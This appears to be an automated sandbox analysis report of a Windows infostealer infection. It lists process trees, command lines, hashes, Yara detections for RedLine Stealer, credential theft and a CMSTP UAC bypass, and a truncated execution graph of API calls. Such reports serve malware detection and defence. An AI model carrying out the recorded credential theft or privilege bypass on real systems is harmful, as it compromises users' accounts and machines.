                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:7
                                                                                                                                                      Start time:02:19:52
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:9
                                                                                                                                                      Start time:02:20:11
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://923204732243015979198396844819192998461207207524972816830460816/
                                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:10
                                                                                                                                                      Start time:02:20:12
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:12
                                                                                                                                                      Start time:02:20:17
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                      Imagebase:0x340000
                                                                                                                                                      File size:262'432 bytes
                                                                                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:13
                                                                                                                                                      Start time:02:20:33
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe"
                                                                                                                                                      Imagebase:0x80000
                                                                                                                                                      File size:2'469'936 bytes
                                                                                                                                                      MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:14
                                                                                                                                                      Start time:02:20:33
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:15
                                                                                                                                                      Start time:02:20:34
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:16
                                                                                                                                                      Start time:02:20:40
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:17
                                                                                                                                                      Start time:02:20:46
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\u3bs.3.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\u3bs.3.exe"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:4'866'096 bytes
                                                                                                                                                      MD5 hash:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000011.00000000.2777480035.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 4%, ReversingLabs
                                                                                                                                                      • Detection: 3%, Virustotal, Browse
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:20
                                                                                                                                                      Start time:02:20:46
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1392
                                                                                                                                                      Imagebase:0x3f0000
                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:22
                                                                                                                                                      Start time:02:20:54
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:23
                                                                                                                                                      Start time:02:20:54
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:25
                                                                                                                                                      Start time:02:20:54
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2360
                                                                                                                                                      Imagebase:0x3f0000
                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:26
                                                                                                                                                      Start time:02:20:54
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"
                                                                                                                                                      Imagebase:0xaa0000
                                                                                                                                                      File size:545'792 bytes
                                                                                                                                                      MD5 hash:6C93FC68E2F01C20FB81AF24470B790C
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 47%, ReversingLabs
                                                                                                                                                      • Detection: 72%, Virustotal, Browse
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:27
                                                                                                                                                      Start time:02:20:57
                                                                                                                                                      Start date:27/04/2024
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                      Imagebase:0xf70000
                                                                                                                                                      File size:262'432 bytes
                                                                                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2968147762.0000000001427000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Has exited:false

                                                                                                                                                      Reset < >

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:6%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:2.5%
                                                                                                                                                        Signature Coverage:13.1%
                                                                                                                                                        Total number of Nodes:1110
                                                                                                                                                        Total number of Limit Nodes:16
                                                                                                                                                        execution_graph 38346 4265436 38347 4265445 38346->38347 38350 4265bd6 38347->38350 38351 4265bf1 38350->38351 38352 4265bfa CreateToolhelp32Snapshot 38351->38352 38353 4265c16 Module32First 38351->38353 38352->38351 38352->38353 38354 4265c25 38353->38354 38356 426544e 38353->38356 38357 4265895 38354->38357 38358 42658c0 38357->38358 38359 42658d1 VirtualAlloc 38358->38359 38360 4265909 38358->38360 38359->38360 38360->38360 38361 41aed0 38366 41ac9e 38361->38366 38364 41aef8 38371 41acc9 38366->38371 38368 41aebc 38385 410905 26 API calls _Deallocate 38368->38385 38370 41ae1b 38370->38364 38378 41a222 38370->38378 38374 41ae12 38371->38374 38381 422bb9 46 API calls 2 library calls 38371->38381 38373 41ae5c 38373->38374 38382 422bb9 46 API calls 2 library calls 38373->38382 38374->38370 38384 412381 20 API calls __dosmaperr 38374->38384 38376 41ae7b 38376->38374 38383 422bb9 46 API calls 2 library calls 38376->38383 38386 419bf7 38378->38386 38380 41a23d 38380->38364 38381->38373 38382->38376 38383->38374 38384->38368 38385->38370 38389 419c03 ___scrt_is_nonwritable_in_current_image 38386->38389 38387 419c11 38404 412381 20 API calls __dosmaperr 38387->38404 38389->38387 38391 419c4a 38389->38391 38390 419c16 38405 410905 26 API calls _Deallocate 38390->38405 38397 41a1d1 38391->38397 38396 419c20 std::_Locinfo::_Locinfo_dtor 38396->38380 38407 4227a8 38397->38407 38403 419c6e 38406 419c97 LeaveCriticalSection __wsopen_s 38403->38406 38404->38390 38405->38396 38406->38396 38408 4227b4 38407->38408 38409 4227cb 38407->38409 38485 412381 20 API calls __dosmaperr 38408->38485 38410 4227d3 38409->38410 38411 4227ea 38409->38411 38487 412381 20 API calls __dosmaperr 38410->38487 38489 4172ce 10 API calls 2 library calls 38411->38489 38415 4227b9 38486 410905 26 API calls _Deallocate 38415->38486 38416 4227d8 38488 410905 26 API calls _Deallocate 38416->38488 38417 4227f1 MultiByteToWideChar 38420 422820 38417->38420 38421 422810 GetLastError 38417->38421 38491 417a45 38420->38491 38490 41234b 20 API calls __dosmaperr 38421->38490 38422 41a1e7 38422->38403 38431 41a242 38422->38431 38426 42282f MultiByteToWideChar 38427 422850 38426->38427 38428 422844 GetLastError 38426->38428 38429 41629a _free 20 API calls 38427->38429 38498 41234b 20 API calls __dosmaperr 38428->38498 38429->38422 38432 41a25f 38431->38432 38433 41a274 38432->38433 38434 41a28d 38432->38434 38515 41236e 20 API calls __dosmaperr 38433->38515 38501 41e6a7 38434->38501 38437 41a292 38438 41a2b2 38437->38438 38439 41a29b 38437->38439 38514 419f10 CreateFileW 38438->38514 38517 41236e 20 API calls __dosmaperr 38439->38517 38443 41a2a0 38518 412381 20 API calls __dosmaperr 38443->38518 38445 41a368 GetFileType 38446 41a373 GetLastError 38445->38446 38452 41a3ba 38445->38452 38521 41234b 20 API calls __dosmaperr 38446->38521 38447 41a279 38516 412381 20 API calls __dosmaperr 38447->38516 38448 41a2eb 38448->38445 38449 41a33d GetLastError 38448->38449 38519 419f10 CreateFileW 38448->38519 38520 41234b 20 API calls __dosmaperr 38449->38520 38523 41e5f0 21 API calls 2 library calls 38452->38523 38453 41a381 CloseHandle 38453->38447 38455 41a3aa 38453->38455 38522 412381 20 API calls __dosmaperr 38455->38522 38457 41a330 38457->38445 38457->38449 38458 41a3db 38460 41a42e 38458->38460 38524 41a121 72 API calls 4 library calls 38458->38524 38525 419cc3 73 API calls 5 library calls 38460->38525 38461 41a3af 38461->38447 38464 41a427 38464->38460 38466 41a456 38464->38466 38465 41a44d 38467 41a465 38465->38467 38468 41a454 38465->38468 38526 4163fd 38466->38526 38471 41a544 38467->38471 38472 41a4e3 CloseHandle 38467->38472 38468->38466 38470 41a20f 38479 41629a 38470->38479 38471->38470 38541 419f10 CreateFileW 38472->38541 38474 41a50e 38474->38471 38475 41a518 GetLastError 38474->38475 38542 41234b 20 API calls __dosmaperr 38475->38542 38477 41a524 38543 41e7b9 21 API calls 2 library calls 38477->38543 38480 4162a5 RtlFreeHeap 38479->38480 38484 4162ce __dosmaperr 38479->38484 38481 4162ba 38480->38481 38480->38484 38571 412381 20 API calls __dosmaperr 38481->38571 38483 4162c0 GetLastError 38483->38484 38484->38403 38485->38415 38486->38422 38487->38416 38488->38422 38489->38417 38490->38422 38492 417a83 38491->38492 38497 417a53 CallUnexpected 38491->38497 38500 412381 20 API calls __dosmaperr 38492->38500 38493 417a6e RtlAllocateHeap 38495 417a81 38493->38495 38493->38497 38495->38426 38495->38427 38497->38492 38497->38493 38499 412ede 7 API calls 2 library calls 38497->38499 38498->38427 38499->38497 38500->38495 38502 41e6b3 ___scrt_is_nonwritable_in_current_image 38501->38502 38544 4119fb EnterCriticalSection 38502->38544 38504 41e701 38545 41e7b0 38504->38545 38505 41e6ba 38505->38504 38506 41e6df 38505->38506 38511 41e74d EnterCriticalSection 38505->38511 38548 41e486 21 API calls 2 library calls 38506->38548 38509 41e72a std::_Locinfo::_Locinfo_dtor 38509->38437 38510 41e6e4 38510->38504 38549 41e5cd EnterCriticalSection 38510->38549 38511->38504 38512 41e75a LeaveCriticalSection 38511->38512 38512->38505 38514->38448 38515->38447 38516->38470 38517->38443 38518->38447 38519->38457 38520->38447 38521->38453 38522->38461 38523->38458 38524->38464 38525->38465 38551 41e84a 38526->38551 38528 416413 38564 41e7b9 21 API calls 2 library calls 38528->38564 38529 41640d 38529->38528 38531 41e84a __wsopen_s 26 API calls 38529->38531 38540 416445 38529->38540 38533 41643c 38531->38533 38532 41e84a __wsopen_s 26 API calls 38534 416451 FindCloseChangeNotification 38532->38534 38537 41e84a __wsopen_s 26 API calls 38533->38537 38534->38528 38538 41645d GetLastError 38534->38538 38535 41646b 38536 41648d 38535->38536 38565 41234b 20 API calls __dosmaperr 38535->38565 38536->38470 38537->38540 38538->38528 38540->38528 38540->38532 38541->38474 38542->38477 38543->38471 38544->38505 38550 411a43 LeaveCriticalSection 38545->38550 38547 41e7b7 38547->38509 38548->38510 38549->38504 38550->38547 38552 41e857 38551->38552 38553 41e86c 38551->38553 38566 41236e 20 API calls __dosmaperr 38552->38566 38558 41e891 38553->38558 38568 41236e 20 API calls __dosmaperr 38553->38568 38555 41e85c 38567 412381 20 API calls __dosmaperr 38555->38567 38558->38529 38559 41e89c 38569 412381 20 API calls __dosmaperr 38559->38569 38560 41e864 38560->38529 38562 41e8a4 38570 410905 26 API calls _Deallocate 38562->38570 38564->38535 38565->38536 38566->38555 38567->38560 38568->38559 38569->38562 38570->38560 38571->38483 38572 4017a2 38573 4017d0 38572->38573 38574 4017ab 38572->38574 38582 401b1e 38573->38582 38578 402c71 38574->38578 38576 4017cb 38579 402ca4 38578->38579 38581 402c80 BuildCatchObjectHelperInternal 38578->38581 38585 40373e 27 API calls 2 library calls 38579->38585 38581->38576 38586 402c50 38582->38586 38585->38581 38587 402c5a 38586->38587 38587->38587 38588 402c71 27 API calls 38587->38588 38589 401b3a 38588->38589 38589->38576 38590 408273 38591 40828f 38590->38591 38592 4082db 38591->38592 38593 4082ce 38591->38593 38596 40831c std::_Xfsopen 29 API calls 38591->38596 38599 4082d5 38593->38599 38600 40831c 38593->38600 38596->38593 38599->38592 38606 40e228 38599->38606 38619 411d27 38600->38619 38602 4082ee 38602->38592 38603 4106ef 38602->38603 38673 41049b 38603->38673 38605 410705 38605->38599 38607 40e234 ___scrt_is_nonwritable_in_current_image 38606->38607 38608 40e245 38607->38608 38609 40e25a 38607->38609 38753 412381 20 API calls __dosmaperr 38608->38753 38618 40e255 _Xfiopen std::_Locinfo::_Locinfo_dtor 38609->38618 38736 40e81d EnterCriticalSection 38609->38736 38612 40e24a 38754 410905 26 API calls _Deallocate 38612->38754 38613 40e276 38737 40e1b2 38613->38737 38616 40e281 38755 40e29e LeaveCriticalSection __fread_nolock 38616->38755 38618->38592 38621 411c66 ___scrt_is_nonwritable_in_current_image 38619->38621 38620 411c80 38644 412381 20 API calls __dosmaperr 38620->38644 38621->38620 38624 411cad 38621->38624 38623 411c85 38645 410905 26 API calls _Deallocate 38623->38645 38625 411cb2 38624->38625 38626 411cbf 38624->38626 38646 412381 20 API calls __dosmaperr 38625->38646 38636 416499 38626->38636 38630 411cc8 38631 411cdc std::_Xfsopen 38630->38631 38632 411ccf 38630->38632 38648 411d10 LeaveCriticalSection __fread_nolock _Xfiopen 38631->38648 38647 412381 20 API calls __dosmaperr 38632->38647 38633 411c90 std::_Locinfo::_Locinfo_dtor 38633->38602 38637 4164a5 ___scrt_is_nonwritable_in_current_image 38636->38637 38649 4119fb EnterCriticalSection 38637->38649 38639 4164b3 38650 416533 38639->38650 38643 4164e4 std::_Locinfo::_Locinfo_dtor 38643->38630 38644->38623 38645->38633 38646->38633 38647->38633 38648->38633 38649->38639 38657 416556 38650->38657 38651 4164c0 38664 4164ef 38651->38664 38652 4165af 38669 41704e 20 API calls 3 library calls 38652->38669 38654 4165b8 38656 41629a _free 20 API calls 38654->38656 38658 4165c1 38656->38658 38657->38651 38657->38652 38657->38657 38667 40e81d EnterCriticalSection 38657->38667 38668 40e831 LeaveCriticalSection 38657->38668 38658->38651 38670 4175b5 11 API calls 2 library calls 38658->38670 38660 4165e0 38671 40e81d EnterCriticalSection 38660->38671 38663 4165f3 38663->38651 38672 411a43 LeaveCriticalSection 38664->38672 38666 4164f6 38666->38643 38667->38657 38668->38657 38669->38654 38670->38660 38671->38663 38672->38666 38677 4104a7 ___scrt_is_nonwritable_in_current_image 38673->38677 38674 4104b3 38698 412381 20 API calls __dosmaperr 38674->38698 38676 4104d9 38686 40e81d EnterCriticalSection 38676->38686 38677->38674 38677->38676 38678 4104b8 38699 410905 26 API calls _Deallocate 38678->38699 38681 4104e5 38687 4105fb 38681->38687 38683 4104f9 38700 410518 LeaveCriticalSection __fread_nolock 38683->38700 38685 4104c3 std::_Locinfo::_Locinfo_dtor 38685->38605 38686->38681 38688 41061d 38687->38688 38689 41060d 38687->38689 38701 410522 38688->38701 38714 412381 20 API calls __dosmaperr 38689->38714 38692 410612 38692->38683 38693 410640 _Xfiopen 38697 4106bf 38693->38697 38705 40dfcb 38693->38705 38697->38683 38698->38678 38699->38685 38700->38685 38702 41052e _Xfiopen 38701->38702 38703 410535 38701->38703 38702->38693 38703->38702 38704 419800 _Xfiopen 28 API calls 38703->38704 38704->38702 38706 40dfe3 38705->38706 38707 40dfdf 38705->38707 38706->38707 38715 4154e8 38706->38715 38711 419800 38707->38711 38709 40e003 38722 415fa3 62 API calls 5 library calls 38709->38722 38725 419767 38711->38725 38714->38692 38716 4154f4 38715->38716 38717 415509 38715->38717 38723 412381 20 API calls __dosmaperr 38716->38723 38717->38709 38719 4154f9 38724 410905 26 API calls _Deallocate 38719->38724 38721 415504 38721->38709 38722->38707 38723->38719 38724->38721 38726 41e84a __wsopen_s 26 API calls 38725->38726 38727 419779 38726->38727 38728 419781 38727->38728 38729 419792 SetFilePointerEx 38727->38729 38734 412381 20 API calls __dosmaperr 38728->38734 38730 419786 38729->38730 38731 4197aa GetLastError 38729->38731 38730->38697 38735 41234b 20 API calls __dosmaperr 38731->38735 38734->38730 38735->38730 38736->38613 38738 40e1d4 38737->38738 38739 40e1bf 38737->38739 38742 40dfcb _Xfiopen 62 API calls 38738->38742 38744 40e1cf _Xfiopen 38738->38744 38775 412381 20 API calls __dosmaperr 38739->38775 38741 40e1c4 38776 410905 26 API calls _Deallocate 38741->38776 38745 40e1e8 38742->38745 38744->38616 38756 4165f6 38745->38756 38748 4154e8 _Xfiopen 26 API calls 38749 40e1f6 38748->38749 38760 41637e 38749->38760 38752 41629a _free 20 API calls 38752->38744 38753->38612 38754->38618 38755->38618 38757 40e1f0 38756->38757 38758 41660c 38756->38758 38757->38748 38758->38757 38759 41629a _free 20 API calls 38758->38759 38759->38757 38761 41638d 38760->38761 38764 4163a2 38760->38764 38780 41236e 20 API calls __dosmaperr 38761->38780 38763 4163dd 38782 41236e 20 API calls __dosmaperr 38763->38782 38764->38763 38767 4163c9 38764->38767 38766 416392 38781 412381 20 API calls __dosmaperr 38766->38781 38777 416356 38767->38777 38768 4163e2 38783 412381 20 API calls __dosmaperr 38768->38783 38772 40e1fc 38772->38744 38772->38752 38773 4163ea 38784 410905 26 API calls _Deallocate 38773->38784 38775->38741 38776->38744 38785 4162d4 38777->38785 38779 41637a 38779->38772 38780->38766 38781->38772 38782->38768 38783->38773 38784->38772 38786 4162e0 ___scrt_is_nonwritable_in_current_image 38785->38786 38796 41e5cd EnterCriticalSection 38786->38796 38788 4162ee 38789 416320 38788->38789 38790 416315 38788->38790 38797 412381 20 API calls __dosmaperr 38789->38797 38791 4163fd __wsopen_s 29 API calls 38790->38791 38793 41631b 38791->38793 38798 41634a LeaveCriticalSection __wsopen_s 38793->38798 38795 41633d std::_Locinfo::_Locinfo_dtor 38795->38779 38796->38788 38797->38793 38798->38795 38799 416ec2 38800 416ee7 38799->38800 38801 416ecf 38799->38801 38805 416f42 38800->38805 38813 416edf 38800->38813 38851 418c55 21 API calls 2 library calls 38800->38851 38849 412381 20 API calls __dosmaperr 38801->38849 38803 416ed4 38850 410905 26 API calls _Deallocate 38803->38850 38806 4154e8 _Xfiopen 26 API calls 38805->38806 38808 416f5a 38806->38808 38819 41919a 38808->38819 38810 416f61 38811 4154e8 _Xfiopen 26 API calls 38810->38811 38810->38813 38812 416f8d 38811->38812 38812->38813 38814 4154e8 _Xfiopen 26 API calls 38812->38814 38815 416f9b 38814->38815 38815->38813 38816 4154e8 _Xfiopen 26 API calls 38815->38816 38817 416fab 38816->38817 38818 4154e8 _Xfiopen 26 API calls 38817->38818 38818->38813 38820 4191a6 ___scrt_is_nonwritable_in_current_image 38819->38820 38821 4191c6 38820->38821 38822 4191ae 38820->38822 38824 41928c 38821->38824 38829 4191ff 38821->38829 38918 41236e 20 API calls __dosmaperr 38822->38918 38925 41236e 20 API calls __dosmaperr 38824->38925 38826 4191b3 38919 412381 20 API calls __dosmaperr 38826->38919 38827 419291 38926 412381 20 API calls __dosmaperr 38827->38926 38831 419223 38829->38831 38832 41920e 38829->38832 38852 41e5cd EnterCriticalSection 38831->38852 38920 41236e 20 API calls __dosmaperr 38832->38920 38834 41921b 38927 410905 26 API calls _Deallocate 38834->38927 38836 419229 38839 419245 38836->38839 38840 41925a 38836->38840 38837 419213 38921 412381 20 API calls __dosmaperr 38837->38921 38922 412381 20 API calls __dosmaperr 38839->38922 38853 4192ad 38840->38853 38842 4191bb std::_Locinfo::_Locinfo_dtor 38842->38810 38845 41924a 38923 41236e 20 API calls __dosmaperr 38845->38923 38846 419255 38924 419284 LeaveCriticalSection __wsopen_s 38846->38924 38849->38803 38850->38813 38851->38805 38852->38836 38854 4192d7 38853->38854 38855 4192bf 38853->38855 38856 419641 38854->38856 38862 41931c 38854->38862 38937 41236e 20 API calls __dosmaperr 38855->38937 38951 41236e 20 API calls __dosmaperr 38856->38951 38858 4192c4 38938 412381 20 API calls __dosmaperr 38858->38938 38861 419646 38952 412381 20 API calls __dosmaperr 38861->38952 38864 419327 38862->38864 38867 4192cc 38862->38867 38871 419357 38862->38871 38939 41236e 20 API calls __dosmaperr 38864->38939 38865 419334 38953 410905 26 API calls _Deallocate 38865->38953 38867->38846 38868 41932c 38940 412381 20 API calls __dosmaperr 38868->38940 38872 419370 38871->38872 38873 4193b2 38871->38873 38874 419396 38871->38874 38872->38874 38880 41937d 38872->38880 38877 417a45 std::_Locinfo::_Locinfo_dtor 21 API calls 38873->38877 38941 41236e 20 API calls __dosmaperr 38874->38941 38876 41939b 38942 412381 20 API calls __dosmaperr 38876->38942 38881 4193c9 38877->38881 38928 4210f9 38880->38928 38882 41629a _free 20 API calls 38881->38882 38885 4193d2 38882->38885 38883 4193a2 38943 410905 26 API calls _Deallocate 38883->38943 38884 41951b 38887 419591 38884->38887 38890 419534 GetConsoleMode 38884->38890 38888 41629a _free 20 API calls 38885->38888 38889 419595 ReadFile 38887->38889 38891 4193d9 38888->38891 38892 419609 GetLastError 38889->38892 38893 4195af 38889->38893 38890->38887 38894 419545 38890->38894 38895 4193e3 38891->38895 38896 4193fe 38891->38896 38897 419616 38892->38897 38898 41956d 38892->38898 38893->38892 38899 419586 38893->38899 38894->38889 38900 41954b ReadConsoleW 38894->38900 38944 412381 20 API calls __dosmaperr 38895->38944 38904 419800 _Xfiopen 28 API calls 38896->38904 38949 412381 20 API calls __dosmaperr 38897->38949 38906 